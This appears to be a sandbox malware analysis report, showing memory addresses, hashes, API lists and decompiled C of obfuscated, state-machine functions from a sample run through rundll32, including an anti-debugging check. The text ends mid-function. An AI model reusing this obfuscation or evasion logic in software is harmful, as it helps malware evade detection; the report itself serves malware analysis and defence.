                                                                                                                          0x0079ba0f
                                                                                                                          0x0079ba14
                                                                                                                          0x0079ba1c
                                                                                                                          0x0079ba24
                                                                                                                          0x0079ba2c
                                                                                                                          0x0079ba3c
                                                                                                                          0x0079ba44
                                                                                                                          0x0079ba47
                                                                                                                          0x0079ba4b
                                                                                                                          0x0079ba53
                                                                                                                          0x0079ba53
                                                                                                                          0x0079ba53
                                                                                                                          0x0079ba58
                                                                                                                          0x00000000
                                                                                                                          0x0079ba58
                                                                                                                          0x0079ba6a
                                                                                                                          0x0079bb2d
                                                                                                                          0x0079bb31
                                                                                                                          0x0079bb36
                                                                                                                          0x0079bb39
                                                                                                                          0x0079bb3c
                                                                                                                          0x0079bb40
                                                                                                                          0x0079bb45
                                                                                                                          0x00000000
                                                                                                                          0x0079bb45
                                                                                                                          0x0079ba76
                                                                                                                          0x0079bac0
                                                                                                                          0x0079bad3
                                                                                                                          0x0079bad8
                                                                                                                          0x0079badb
                                                                                                                          0x0079bade
                                                                                                                          0x0079bae0
                                                                                                                          0x0079baf8
                                                                                                                          0x0079bafd
                                                                                                                          0x0079bb00
                                                                                                                          0x0079bb04
                                                                                                                          0x0079bb0c
                                                                                                                          0x0079bb10
                                                                                                                          0x0079bb15
                                                                                                                          0x0079bb18
                                                                                                                          0x00000000
                                                                                                                          0x0079bb18
                                                                                                                          0x0079ba78
                                                                                                                          0x0079ba7a
                                                                                                                          0x00000000
                                                                                                                          0x0079bb75
                                                                                                                          0x0079ba82
                                                                                                                          0x00000000
                                                                                                                          0x0079ba88
                                                                                                                          0x0079baa9
                                                                                                                          0x0079baae
                                                                                                                          0x0079bab1
                                                                                                                          0x0079bab6
                                                                                                                          0x0079babc
                                                                                                                          0x0079ba53
                                                                                                                          0x0079ba53
                                                                                                                          0x0079ba53
                                                                                                                          0x00000000
                                                                                                                          0x0079ba53
                                                                                                                          0x0079ba53
                                                                                                                          0x0079bab6
                                                                                                                          0x0079ba82
                                                                                                                          0x0079bb7d
                                                                                                                          0x0079bb7d
                                                                                                                          0x0079bb4d
                                                                                                                          0x0079bb52
                                                                                                                          0x0079bb52
                                                                                                                          0x0079bb52
                                                                                                                          0x00000000
                                                                                                                          0x0079ba58

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: !)$2+l$>e`$?p$J$e'
                                                                                                                          • API String ID: 0-1675410552
                                                                                                                          • Opcode ID: 03d9d8a06b86b826e2fc3bbbde3b68ffc0bda5e59632d46a4252074f250338d7
                                                                                                                          • Instruction ID: 090b521ca73fa8fc03777e35bd894649cd2d6a76d0fc0c986bb527b9219e8a48
                                                                                                                          • Opcode Fuzzy Hash: 03d9d8a06b86b826e2fc3bbbde3b68ffc0bda5e59632d46a4252074f250338d7
                                                                                                                          • Instruction Fuzzy Hash: 1FB130724083409FC758CF65D58A40BFBE2FBD5758F108A1CF58A96260D3B9CA59CF86
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1002F81E Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 100357B5
                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 100357CA
                                                                                                                          • UnhandledExceptionFilter.KERNEL32(10049C70), ref: 100357D5
                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 100357F1
                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 100357F8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2579439406-0
                                                                                                                          • Opcode ID: 8c939c2efb241c6fb0af2f27818b77021c2f68401b871af98be5750efaca2114
                                                                                                                          • Instruction ID: 3237c6aacfb12be4d9d12df29f826ae8d0614ddfd4a103b53015e2b6a0b2c6c3
                                                                                                                          • Opcode Fuzzy Hash: 8c939c2efb241c6fb0af2f27818b77021c2f68401b871af98be5750efaca2114
                                                                                                                          • Instruction Fuzzy Hash: B021FFB4801320CFFB11DF68EDC56483BB4FB88315F50606AE90D87A71E7B16A80AF56
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007B0056 Relevance: 6.7, Strings: 5, Instructions: 443COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 88%
                                                                                                                          			E007B0056() {
				char _v520;
				char _v1040;
				char _v1560;
				char _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				unsigned int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				void* _t500;
				void* _t502;
				intOrPtr* _t509;
				void* _t513;
				signed int _t522;
				intOrPtr _t523;
				intOrPtr* _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				void* _t540;
				void* _t546;
				intOrPtr _t556;
				void* _t603;
				signed int _t605;
				signed int* _t609;

				_t609 =  &_v1748;
				_v1648 = 0xded5e0;
				_v1648 = _v1648 >> 0xb;
				_v1648 = _v1648 | 0x3a1a97de;
				_v1648 = _v1648 ^ 0x3a1a9ff7;
				_v1608 = 0x6694ca;
				_v1608 = _v1608 | 0xdc2b4f48;
				_v1608 = _v1608 ^ 0x5c6fdfcb;
				_v1712 = 0x53f825;
				_v1712 = _v1712 >> 2;
				_v1712 = _v1712 ^ 0x4e440c95;
				_v1712 = _v1712 | 0x7235b0e7;
				_v1712 = _v1712 ^ 0x7e75f2fd;
				_v1632 = 0xc6d169;
				_v1568 = 0;
				_t603 = 0x9805d0a;
				_t525 = 0x52;
				_v1632 = _v1632 / _t525;
				_t526 = 0x67;
				_v1632 = _v1632 * 0x1e;
				_v1632 = _v1632 ^ 0x0048bcfb;
				_v1596 = 0x189afb;
				_v1596 = _v1596 >> 0xe;
				_v1596 = _v1596 ^ 0x000d7c1d;
				_v1724 = 0x4bfed1;
				_v1724 = _v1724 * 0x63;
				_v1724 = _v1724 * 0x55;
				_v1724 = _v1724 >> 1;
				_v1724 = _v1724 ^ 0x61069d5d;
				_v1580 = 0x401b2b;
				_v1580 = _v1580 + 0x7090;
				_v1580 = _v1580 ^ 0x00412b45;
				_v1672 = 0xbaa782;
				_v1672 = _v1672 / _t526;
				_v1672 = _v1672 << 2;
				_v1672 = _v1672 ^ 0x000e5528;
				_v1624 = 0x1efbce;
				_t527 = 0x4f;
				_v1624 = _v1624 / _t527;
				_v1624 = _v1624 ^ 0x000dc160;
				_v1572 = 0x9ef416;
				_t605 = 0x62;
				_v1572 = _v1572 / _t605;
				_v1572 = _v1572 ^ 0x00079814;
				_v1612 = 0x4efe15;
				_t528 = 0x43;
				_v1612 = _v1612 / _t528;
				_v1612 = _v1612 ^ 0x000e5446;
				_v1640 = 0x94326d;
				_t529 = 0x77;
				_v1640 = _v1640 / _t529;
				_t530 = 0x35;
				_v1640 = _v1640 / _t530;
				_v1640 = _v1640 ^ 0x000d83b8;
				_v1676 = 0x511d41;
				_t531 = 9;
				_v1676 = _v1676 * 0x76;
				_v1676 = _v1676 ^ 0xeef8e480;
				_v1676 = _v1676 ^ 0xcb952f57;
				_v1708 = 0x4e0a18;
				_v1708 = _v1708 ^ 0x2110c6ad;
				_v1708 = _v1708 | 0x4a7f48ac;
				_v1708 = _v1708 + 0xffff2cb4;
				_v1708 = _v1708 ^ 0x6b758b76;
				_v1732 = 0x7a6741;
				_t123 =  &_v1732; // 0x7a6741
				_v1732 =  *_t123 / _t531;
				_v1732 = _v1732 << 0xe;
				_v1732 = _v1732 << 7;
				_v1732 = _v1732 ^ 0x36245548;
				_v1700 = 0x42788;
				_t532 = 0x44;
				_v1700 = _v1700 / _t532;
				_v1700 = _v1700 | 0xce808109;
				_v1700 = _v1700 + 0xffff7a0f;
				_v1700 = _v1700 ^ 0xce88d2ed;
				_v1740 = 0x39c25c;
				_v1740 = _v1740 + 0xf71;
				_t533 = 0x75;
				_v1740 = _v1740 / _t533;
				_v1740 = _v1740 ^ 0xc60840fd;
				_v1740 = _v1740 ^ 0xc60d36f5;
				_v1716 = 0x2bcc6c;
				_v1716 = _v1716 + 0x97be;
				_v1716 = _v1716 >> 0xd;
				_v1716 = _v1716 ^ 0xcb020dbc;
				_v1716 = _v1716 ^ 0xcb05808e;
				_v1604 = 0x3f7ac0;
				_v1604 = _v1604 + 0xafc6;
				_v1604 = _v1604 ^ 0x0048c4ef;
				_v1576 = 0x9f011d;
				_v1576 = _v1576 ^ 0x8bb25c52;
				_v1576 = _v1576 ^ 0x8b2a60ae;
				_v1684 = 0xe4045e;
				_v1684 = _v1684 * 0x42;
				_v1684 = _v1684 * 0xc;
				_v1684 = _v1684 ^ 0xc16ccb70;
				_v1720 = 0x76be5;
				_v1720 = _v1720 >> 0xd;
				_v1720 = _v1720 * 0x3b;
				_v1720 = _v1720 + 0xffffaa4e;
				_v1720 = _v1720 ^ 0xfff1ea6d;
				_v1680 = 0x1fb4c3;
				_v1680 = _v1680 << 4;
				_v1680 = _v1680 << 0xc;
				_v1680 = _v1680 ^ 0xb4c6c556;
				_v1644 = 0xb0dbcd;
				_v1644 = _v1644 << 0xf;
				_v1644 = _v1644 << 0x10;
				_v1644 = _v1644 ^ 0x800a09c5;
				_v1600 = 0x1a67e8;
				_v1600 = _v1600 | 0xeb4b5744;
				_v1600 = _v1600 ^ 0xeb54c7c0;
				_v1652 = 0x1784b1;
				_v1652 = _v1652 >> 0xf;
				_v1652 = _v1652 << 6;
				_v1652 = _v1652 ^ 0x00082079;
				_v1660 = 0xec7770;
				_v1660 = _v1660 + 0xb190;
				_v1660 = _v1660 | 0x400c0cca;
				_v1660 = _v1660 ^ 0x40ee2104;
				_v1668 = 0xfc9259;
				_v1668 = _v1668 + 0xffffc6b7;
				_v1668 = _v1668 >> 0xe;
				_v1668 = _v1668 ^ 0x000f272a;
				_v1704 = 0xff7fae;
				_v1704 = _v1704 + 0xffff711f;
				_v1704 = _v1704 + 0xffff4b94;
				_v1704 = _v1704 | 0x5a3393fe;
				_v1704 = _v1704 ^ 0x5af53198;
				_v1616 = 0x130067;
				_t534 = 0x4e;
				_v1616 = _v1616 / _t534;
				_v1616 = _v1616 ^ 0x00057283;
				_v1628 = 0x10552;
				_v1628 = _v1628 + 0xf3cd;
				_v1628 = _v1628 + 0x9e6e;
				_v1628 = _v1628 ^ 0x00033ec8;
				_v1636 = 0x95cc92;
				_v1636 = _v1636 >> 0xf;
				_v1636 = _v1636 + 0x9761;
				_v1636 = _v1636 ^ 0x000e6713;
				_v1748 = 0xd7b406;
				_t535 = 0x31;
				_v1748 = _v1748 * 0x46;
				_v1748 = _v1748 << 1;
				_v1748 = _v1748 + 0x479a;
				_v1748 = _v1748 ^ 0x75ff50ef;
				_v1584 = 0xe29275;
				_v1584 = _v1584 * 0x6d;
				_v1584 = _v1584 ^ 0x607f0d3c;
				_v1664 = 0xc2b99a;
				_v1664 = _v1664 / _t605;
				_v1664 = _v1664 | 0xc7d1021c;
				_v1664 = _v1664 ^ 0xc7dc1815;
				_v1692 = 0xa5d2da;
				_v1692 = _v1692 * 0x17;
				_v1692 = _v1692 / _t535;
				_t536 = 0x23;
				_v1692 = _v1692 * 0x3a;
				_v1692 = _v1692 ^ 0x11a891cb;
				_v1656 = 0x680db3;
				_v1656 = _v1656 >> 6;
				_v1656 = _v1656 >> 5;
				_v1656 = _v1656 ^ 0x000507e8;
				_v1728 = 0x12970f;
				_v1728 = _v1728 + 0xffffbe66;
				_v1728 = _v1728 >> 6;
				_v1728 = _v1728 / _t536;
				_v1728 = _v1728 ^ 0x00053169;
				_v1620 = 0xa87d1b;
				_v1620 = _v1620 + 0xc3ba;
				_v1620 = _v1620 ^ 0x00a7b1ac;
				_v1736 = 0xb206b7;
				_v1736 = _v1736 ^ 0x6f4eb888;
				_t537 = 0x5d;
				_v1736 = _v1736 / _t537;
				_v1736 = _v1736 + 0x173b;
				_v1736 = _v1736 ^ 0x013191a0;
				_v1744 = 0xbf67a7;
				_t538 = 0x70;
				_v1744 = _v1744 / _t538;
				_v1744 = _v1744 | 0x1279871b;
				_v1744 = _v1744 ^ 0x04c3b9b8;
				_v1744 = _v1744 ^ 0x16b0fef0;
				_v1588 = 0x7bc48a;
				_v1588 = _v1588 << 7;
				_v1588 = _v1588 ^ 0x3de90636;
				_v1688 = 0x5dc5eb;
				_v1688 = _v1688 >> 0xb;
				_v1688 = _v1688 + 0xaf87;
				_t539 = 0x6c;
				_t522 = _v1568;
				_v1688 = _v1688 * 0x63;
				_v1688 = _v1688 ^ 0x004fac27;
				_v1696 = 0x311285;
				_v1696 = _v1696 << 0xb;
				_v1696 = _v1696 ^ 0x3061b352;
				_v1696 = _v1696 / _t539;
				_v1696 = _v1696 ^ 0x01b73771;
				_v1592 = 0x977507;
				_v1592 = _v1592 | 0xf9843f0d;
				_v1592 = _v1592 ^ 0xf99a58c3;
				while(1) {
					L1:
					_t540 = 0x5c;
					while(1) {
						L2:
						_t500 = 0x8167d85;
						do {
							L3:
							if(_t603 == 0x2c7b186) {
								E00791FD1(_v1688, _v1696, _v1592, _v1564);
								_t603 = 0xcf98960;
								goto L18;
							} else {
								if(_t603 == 0x33b45b1) {
									_push(_v1680);
									_push(_v1720);
									_t502 = E007ADCF7(_v1684, 0x791080, __eflags);
									_pop(_t546);
									__eflags = E0079AAD6(_t502, _v1644, _v1600, _v1608, _t546, _t546, _v1652, _v1660, _v1668, _t546,  &_v1564, _v1704, _t546, _v1712, _t546, _v1616);
									_t603 =  ==  ? 0x8167d85 : 0xcf98960;
									E0079A8B0(_v1628, _t502, _v1636);
									_t609 =  &(_t609[0xf]);
									L18:
									_t500 = 0x8167d85;
									_t540 = 0x5c;
								} else {
									if(_t603 == _t500) {
										_t509 = E0079F002(2 + E0079CB52(_v1748,  &_v1560, _v1584, _v1664, _v1692) * 2, _v1728, _t522, 2 + E0079CB52(_v1748,  &_v1560, _v1584, _v1664, _v1692) * 2,  &_v1560, _v1620, _v1736, _v1632, _v1744, _v1588, _v1564);
										_t609 =  &(_t609[0xd]);
										__eflags = _t509;
										_t603 = 0x2c7b186;
										_v1568 = 0 | __eflags == 0x00000000;
										goto L1;
									} else {
										if(_t603 == 0x9805d0a) {
											_push(_v1672);
											_push(_v1648);
											_push(_v1580);
											_push( &_v520);
											E007A46BB(_v1596, _v1724);
											_t609 = _t609 - 0xc + 0x1c;
											_t603 = 0xc81d40c;
											while(1) {
												L1:
												_t540 = 0x5c;
												goto L2;
											}
										} else {
											if(_t603 == 0xaea35f7) {
												_t523 =  *0x7b3e10; // 0x0
												_t524 = _t523 + 0x1c;
												while(1) {
													__eflags =  *_t524 - _t540;
													if(__eflags == 0) {
														break;
													}
													_t524 = _t524 + 2;
													__eflags = _t524;
												}
												_t522 = _t524 + 2;
												_t603 = 0x33b45b1;
												goto L2;
											} else {
												_t618 = _t603 - 0xc81d40c;
												if(_t603 == 0xc81d40c) {
													_push(_v1612);
													_push(_v1572);
													_t513 = E007ADCF7(_v1624, 0x791020, _t618);
													E007A176B( &_v1040, _t618);
													_t556 =  *0x7b3e10; // 0x0
													_t403 = _t556 + 0x1c; // 0x1c
													_t404 = _t556 + 0x23c; // 0x23c
													E007A1652(_v1676, _t618, _t404, _t403, _v1708, _v1732, _t513, 0x104,  &_v1560, _v1700,  &_v520, _v1740,  &_v1040, _v1716);
													E0079A8B0(_v1604, _t513, _v1576);
													_t609 =  &(_t609[0xf]);
													_t603 = 0xaea35f7;
													while(1) {
														L1:
														_t540 = 0x5c;
														L2:
														_t500 = 0x8167d85;
														goto L3;
													}
												}
											}
										}
									}
								}
							}
							__eflags = _t603 - 0xcf98960;
						} while (__eflags != 0);
						return _v1568;
					}
				}
			}

















































































                                                                                                                          0x007b0056
                                                                                                                          0x007b005c
                                                                                                                          0x007b0066
                                                                                                                          0x007b006d
                                                                                                                          0x007b0075
                                                                                                                          0x007b007d
                                                                                                                          0x007b0088
                                                                                                                          0x007b0093
                                                                                                                          0x007b009e
                                                                                                                          0x007b00a6
                                                                                                                          0x007b00ab
                                                                                                                          0x007b00b3
                                                                                                                          0x007b00bb
                                                                                                                          0x007b00c3
                                                                                                                          0x007b00cf
                                                                                                                          0x007b00d6
                                                                                                                          0x007b00e4
                                                                                                                          0x007b00e9
                                                                                                                          0x007b00fa
                                                                                                                          0x007b00fd
                                                                                                                          0x007b0104
                                                                                                                          0x007b010f
                                                                                                                          0x007b011a
                                                                                                                          0x007b0122
                                                                                                                          0x007b012d
                                                                                                                          0x007b013a
                                                                                                                          0x007b0143
                                                                                                                          0x007b0147
                                                                                                                          0x007b014b
                                                                                                                          0x007b0153
                                                                                                                          0x007b015e
                                                                                                                          0x007b0169
                                                                                                                          0x007b0174
                                                                                                                          0x007b0184
                                                                                                                          0x007b0188
                                                                                                                          0x007b018d
                                                                                                                          0x007b0195
                                                                                                                          0x007b01a7
                                                                                                                          0x007b01ac
                                                                                                                          0x007b01b5
                                                                                                                          0x007b01c0
                                                                                                                          0x007b01d2
                                                                                                                          0x007b01d7
                                                                                                                          0x007b01e0
                                                                                                                          0x007b01eb
                                                                                                                          0x007b01fd
                                                                                                                          0x007b0202
                                                                                                                          0x007b020b
                                                                                                                          0x007b0216
                                                                                                                          0x007b0228
                                                                                                                          0x007b022b
                                                                                                                          0x007b0237
                                                                                                                          0x007b023c
                                                                                                                          0x007b0245
                                                                                                                          0x007b0250
                                                                                                                          0x007b025d
                                                                                                                          0x007b0260
                                                                                                                          0x007b0264
                                                                                                                          0x007b026c
                                                                                                                          0x007b0274
                                                                                                                          0x007b027c
                                                                                                                          0x007b0284
                                                                                                                          0x007b028c
                                                                                                                          0x007b0294
                                                                                                                          0x007b029c
                                                                                                                          0x007b02a4
                                                                                                                          0x007b02ac
                                                                                                                          0x007b02b0
                                                                                                                          0x007b02b5
                                                                                                                          0x007b02ba
                                                                                                                          0x007b02c2
                                                                                                                          0x007b02ce
                                                                                                                          0x007b02d3
                                                                                                                          0x007b02d9
                                                                                                                          0x007b02e1
                                                                                                                          0x007b02e9
                                                                                                                          0x007b02f1
                                                                                                                          0x007b02f9
                                                                                                                          0x007b0305
                                                                                                                          0x007b0308
                                                                                                                          0x007b030c
                                                                                                                          0x007b0314
                                                                                                                          0x007b031c
                                                                                                                          0x007b0324
                                                                                                                          0x007b032c
                                                                                                                          0x007b0331
                                                                                                                          0x007b0339
                                                                                                                          0x007b0341
                                                                                                                          0x007b034c
                                                                                                                          0x007b0357
                                                                                                                          0x007b0362
                                                                                                                          0x007b036d
                                                                                                                          0x007b0378
                                                                                                                          0x007b0383
                                                                                                                          0x007b0390
                                                                                                                          0x007b0399
                                                                                                                          0x007b039d
                                                                                                                          0x007b03a5
                                                                                                                          0x007b03ad
                                                                                                                          0x007b03b7
                                                                                                                          0x007b03bb
                                                                                                                          0x007b03c3
                                                                                                                          0x007b03cb
                                                                                                                          0x007b03d3
                                                                                                                          0x007b03d8
                                                                                                                          0x007b03dd
                                                                                                                          0x007b03e5
                                                                                                                          0x007b03ed
                                                                                                                          0x007b03f2
                                                                                                                          0x007b03f7
                                                                                                                          0x007b03ff
                                                                                                                          0x007b040a
                                                                                                                          0x007b0415
                                                                                                                          0x007b0422
                                                                                                                          0x007b042a
                                                                                                                          0x007b042f
                                                                                                                          0x007b0434
                                                                                                                          0x007b043c
                                                                                                                          0x007b0444
                                                                                                                          0x007b044c
                                                                                                                          0x007b0454
                                                                                                                          0x007b045c
                                                                                                                          0x007b0464
                                                                                                                          0x007b046c
                                                                                                                          0x007b0471
                                                                                                                          0x007b0479
                                                                                                                          0x007b0481
                                                                                                                          0x007b0489
                                                                                                                          0x007b0491
                                                                                                                          0x007b0499
                                                                                                                          0x007b04a1
                                                                                                                          0x007b04b5
                                                                                                                          0x007b04ba
                                                                                                                          0x007b04c1
                                                                                                                          0x007b04cc
                                                                                                                          0x007b04d7
                                                                                                                          0x007b04e2
                                                                                                                          0x007b04ed
                                                                                                                          0x007b04f8
                                                                                                                          0x007b0503
                                                                                                                          0x007b050b
                                                                                                                          0x007b0516
                                                                                                                          0x007b0521
                                                                                                                          0x007b0530
                                                                                                                          0x007b0533
                                                                                                                          0x007b0537
                                                                                                                          0x007b053b
                                                                                                                          0x007b0543
                                                                                                                          0x007b054b
                                                                                                                          0x007b055e
                                                                                                                          0x007b0565
                                                                                                                          0x007b0570
                                                                                                                          0x007b0580
                                                                                                                          0x007b0584
                                                                                                                          0x007b058c
                                                                                                                          0x007b0594
                                                                                                                          0x007b05a1
                                                                                                                          0x007b05ad
                                                                                                                          0x007b05b6
                                                                                                                          0x007b05b7
                                                                                                                          0x007b05bb
                                                                                                                          0x007b05c3
                                                                                                                          0x007b05cb
                                                                                                                          0x007b05d0
                                                                                                                          0x007b05d5
                                                                                                                          0x007b05dd
                                                                                                                          0x007b05e5
                                                                                                                          0x007b05ed
                                                                                                                          0x007b05f8
                                                                                                                          0x007b05fc
                                                                                                                          0x007b0604
                                                                                                                          0x007b060f
                                                                                                                          0x007b061a
                                                                                                                          0x007b0625
                                                                                                                          0x007b062d
                                                                                                                          0x007b0642
                                                                                                                          0x007b0647
                                                                                                                          0x007b064d
                                                                                                                          0x007b0655
                                                                                                                          0x007b065d
                                                                                                                          0x007b0669
                                                                                                                          0x007b066e
                                                                                                                          0x007b0674
                                                                                                                          0x007b067c
                                                                                                                          0x007b0684
                                                                                                                          0x007b068c
                                                                                                                          0x007b0697
                                                                                                                          0x007b069f
                                                                                                                          0x007b06aa
                                                                                                                          0x007b06b2
                                                                                                                          0x007b06b7
                                                                                                                          0x007b06c4
                                                                                                                          0x007b06c5
                                                                                                                          0x007b06cc
                                                                                                                          0x007b06d0
                                                                                                                          0x007b06d8
                                                                                                                          0x007b06e0
                                                                                                                          0x007b06e5
                                                                                                                          0x007b06f3
                                                                                                                          0x007b06f7
                                                                                                                          0x007b06ff
                                                                                                                          0x007b070a
                                                                                                                          0x007b0715
                                                                                                                          0x007b0720
                                                                                                                          0x007b0720
                                                                                                                          0x007b0722
                                                                                                                          0x007b0723
                                                                                                                          0x007b0723
                                                                                                                          0x007b0723
                                                                                                                          0x007b0728
                                                                                                                          0x007b0728
                                                                                                                          0x007b072e
                                                                                                                          0x007b098a
                                                                                                                          0x007b0991
                                                                                                                          0x00000000
                                                                                                                          0x007b0734
                                                                                                                          0x007b073a
                                                                                                                          0x007b08ea
                                                                                                                          0x007b08f3
                                                                                                                          0x007b08fb
                                                                                                                          0x007b0901
                                                                                                                          0x007b095c
                                                                                                                          0x007b0967
                                                                                                                          0x007b096a
                                                                                                                          0x007b096f
                                                                                                                          0x007b0993
                                                                                                                          0x007b0995
                                                                                                                          0x007b099a
                                                                                                                          0x007b0740
                                                                                                                          0x007b0742
                                                                                                                          0x007b08ca
                                                                                                                          0x007b08d1
                                                                                                                          0x007b08d4
                                                                                                                          0x007b08d6
                                                                                                                          0x007b08de
                                                                                                                          0x00000000
                                                                                                                          0x007b0748
                                                                                                                          0x007b074e
                                                                                                                          0x007b0831
                                                                                                                          0x007b083c
                                                                                                                          0x007b0840
                                                                                                                          0x007b0855
                                                                                                                          0x007b0856
                                                                                                                          0x007b085b
                                                                                                                          0x007b085e
                                                                                                                          0x007b0720
                                                                                                                          0x007b0720
                                                                                                                          0x007b0722
                                                                                                                          0x00000000
                                                                                                                          0x007b0722
                                                                                                                          0x007b0754
                                                                                                                          0x007b075a
                                                                                                                          0x007b0811
                                                                                                                          0x007b0817
                                                                                                                          0x007b081f
                                                                                                                          0x007b081f
                                                                                                                          0x007b0822
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007b081c
                                                                                                                          0x007b081c
                                                                                                                          0x007b081c
                                                                                                                          0x007b0824
                                                                                                                          0x007b0827
                                                                                                                          0x00000000
                                                                                                                          0x007b0760
                                                                                                                          0x007b0760
                                                                                                                          0x007b0766
                                                                                                                          0x007b076c
                                                                                                                          0x007b0778
                                                                                                                          0x007b0786
                                                                                                                          0x007b0794
                                                                                                                          0x007b07cb
                                                                                                                          0x007b07d8
                                                                                                                          0x007b07dc
                                                                                                                          0x007b07ea
                                                                                                                          0x007b07ff
                                                                                                                          0x007b0804
                                                                                                                          0x007b0807
                                                                                                                          0x007b0720
                                                                                                                          0x007b0720
                                                                                                                          0x007b0722
                                                                                                                          0x007b0723
                                                                                                                          0x007b0723
                                                                                                                          0x00000000
                                                                                                                          0x007b0723
                                                                                                                          0x007b0720
                                                                                                                          0x007b0766
                                                                                                                          0x007b075a
                                                                                                                          0x007b074e
                                                                                                                          0x007b0742
                                                                                                                          0x007b073a
                                                                                                                          0x007b099b
                                                                                                                          0x007b099b
                                                                                                                          0x007b09b4
                                                                                                                          0x007b09b4
                                                                                                                          0x007b0723

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Agz$DWK$E+A$g$pw
                                                                                                                          • API String ID: 0-1474679353
                                                                                                                          • Opcode ID: 1e732d5816592925c07cfdc99e7f4acabcc28127065b88e90bec72ecbe0da194
                                                                                                                          • Instruction ID: a6d5aa3242ea2ca583998f15956c3b2f5377a5fbc12e446e17b07a67d05c078a
                                                                                                                          • Opcode Fuzzy Hash: 1e732d5816592925c07cfdc99e7f4acabcc28127065b88e90bec72ecbe0da194
                                                                                                                          • Instruction Fuzzy Hash: 8E32117250C380CFD368CF25C94AA8BFBE2BBC5748F10891DE19986261D7B59949CF46
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0079F09B Relevance: 6.6, Strings: 5, Instructions: 359COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E0079F09B(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
